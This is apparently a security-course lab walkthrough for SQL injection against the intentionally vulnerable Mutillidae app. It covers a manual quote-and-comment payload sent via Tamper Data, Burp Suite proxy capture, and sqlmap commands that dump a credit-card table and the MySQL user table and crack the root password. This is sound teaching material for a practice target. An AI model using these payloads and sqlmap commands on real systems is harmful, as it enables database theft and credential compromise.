OWASP Top 10 Web Hacking Final Lab 12 - SQL Injection with sqlmap, tamper data & burpsuite

{ SQL Injection with sqlmap, tamper data & burpsuite }

---

OWASP Top 10 Web Hacking Final  Lab 12 

Navigate to "View Someones Blog"

1. On BackTrack, Open Firefox
   • Instructions:
     1. Click on the Firefox Icon
   • Notes (FYI):
     • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
2. Open Mutillidae
   • Notes (FYI):
     • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. http://192.168.1.111/mutillidae
3. Go to View Someones Blog
   • Instructions:
     1. OWASP Top 10 --> A1 - SQL Injection --> SQLMAP Practice --> View Someones Blog

Section 8. Positive SQL Injection Test

1. Activate Tamper Data
   • Instructions:
     1. Tools --> Tamper Data
2. Start the Tamper
   • Instructions:
     1. Click on Start Tamper
3. View Blog Entries
   • Instructions:
     1. Select "admin" from the drop down menu
     2. Click on the View Blog Entries
4. Tamper with request?
   • Instructions:
     1. Click on the Tamper Button
5. Modify Post Parameter Values
   • Instructions:
     1. Replace admin with '' --
        • Where there are two single quotes (').
        • Remember to put a space after the last hyphen (-).
     2. Click the OK Button
   • Note(FYI):
     1. The goal of submitting '' --  to the webpage form is to produce empty results without triggering an error.
     2. Some web administrators have automated alerts that are triggered from application and database log errors.
     3. So in this case, we now know a SQL injection is possible, without creating an error.
6. Close Tamper Data
   • Instructions:
     1. Click the X to close Tamper Data
   • Note(FYI):
     1. We are closing Tamper Data, because we no longer need to tamper with any HTTP POST REQUESTS.
     2. Continue to Next Step.
7. Viewing the Results
   • Note(FYI):
     1. Notice 0 records where returned.
     2. This test was positive, because it did not trigger any errors, but it did produce the column headers if results were to be returned.

Section 12. Configure Firefox Proxy Settings

1. View Preferences
   • Instructions:
     1. Edit --> Preferences
    
2. Advanced Settings...
   • Instructions:
     1. Click on the Advanced Icon
     2. Click on the Network Tab
     3. Click on the Setting... button
3. Connection Settings
   • Instructions:
     1. Click on Manual proxy configurations
     2. Type "127.0.0.1" in the HTTP Proxy Text Box
     3. Type "8080" in the Port Text Box
     4. Check Use the proxy server for all protocols
     5. Click OK
     6. Click Close

Section 13. Configure Burp Suite

1. Start Burp Suite
   • Instructions:
     1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Assessment ---> Web Application Proxies --> burpsuite
    
2. JRE Message
   • Instructions:
     1. Click OK
3. Configure proxy
   • Instructions:
     1. Click on the proxy tab
     2. Click on the options tab
     3. Verify the port is set to 8080

Section 12. Capture Post Parameters with Burpsuite

1. View Blog Entries
   • Instructions:
     1. Select "admin" from the drop down menu
     2. Click on the View Blog Entries
2. Copy Post Parameter
   • Instructions:
     1. Highlight all the text.
     2. Right Click on the Highlighted text.
        • This will create menu list.
     3. Select Copy.
3. Open gedit
   • Notes (FYI):
     • gedit is a UTF-8 compatible text editor for the GNOME desktop environment, Mac OS X and Microsoft Windows.
   • Instructions:
     1. gedit /pentest/database/sqlmap/burp.txt &
4. Save File
   • Notes (FYI):
     • The Edit-->Paste feature does not work from burpsuite; therefore, you will press the <Ctrl> and v keys to paste.
   • Instructions:
     1. Press the <Ctrl> and v keys to paste.
     2. Click the Save button

Section 13. Using sqlmap against Mutillidae

1. View Databases with sqlmap
   • Instructions:
     1. cd /pentest/database/sqlmap
     2. grep "Referer" burp.txt | awk '{print $2}'
     3. grep "author" burp.txt
     4. grep "Cookie" burp.txt | sed 's/Cookie: //'
     5. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" --dbs
        • Replace 192.168.1.111. with Mutillidae's IP address obtained from (Section 3, Step 3).
        • Replace the following cookie string showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24 with the cookie obtain from the Step 4 above. 
2. View Database Results
   • Instructions:
     1. Do you want to keep testing the others? [y/N] N
     2. Notice the databases sqlmap returns.
3. View nowasp database tables
   • Instructions:
     1. Press the UP ARROW to display the previous command
     2. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" -D nowasp --tables
   • Notes (FYI):
     1. -D nowasp --tables, display the nowasp database tables.
4. View table results with sqlmap
   • Note(FYI):
     1. Notice the 11 nowasp tables
     2. Notice there is a credit card table.
5. Retrieve credit_cards table contents
   • Instructions:
     1. Press the UP ARROW to display the previous command
     2. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" -D nowasp -T credit_cards --dump
   • Note(FYI):
     1. -D nowasp -T credit_cards --dump, display the credit_cards table content.
6. Review credit_cards table results
   • Instructions:
     1. Do you want to use dictionary attack ... [Y/n/q] n
     2. Notice the pretend credit card numbers.

Section 14. Using sqlmap -- Load HTTP request from a file

1. View Databases with sqlmap
   • Instructions:
     1. ./sqlmap.py -r burp.txt --dbs
   • Note(FYI):
     1. -r, This option is very kool.  It allows you to use the burpsuite file we saved in (Section 12, Step 4), instead of using the -u, --data, and --cookie options.
     2. --dbs, This options displays all the databases.
     3. I guess I could of showed you this option earlier, but good things come to those who wait.
2. View Databases results
   • Note(FYI):
     1. Notice that all the databases are displayed similar to (Section 13, Step 2).
     2. The mysql database contains important internal tables including usernames and passwords.
3. View tables with sqlmap
   • Instructions:
     1. ./sqlmap.py -r burp.txt -D mysql --tables
   • Note(FYI):
     1. -D mysql --tables, This option displays the mysql database tables.
4. View tables results
   • Note(FYI):
     1. Notice all the tables for the mysql database are displayed.
     2. The user table contains all the usernames and passwords for each database.
5. View user table contents with sqlmap
   • Instructions:
     1. ./sqlmap.py -r burp.txt -D mysql -T user --dump
   • Note(FYI):
     1. -D mysql -T user --dump, This option displays the content of the user table in the mysql database.
6. View user table password
   • Instructions:
     1. Do you want to sue dictionary attack ... [Y/n/q] Y
     2. What's the dictionary location? <Press Enter>
     3. Do you want to use common password suffices? [y/N] N
     4. Notice the user is 'root' and the password is 'samurai'

Section 15. Proof of Lab

1. Proof of Lab Các bạn hãy quay lại toàn bộ tiến trình thực hành và text note có tên của mình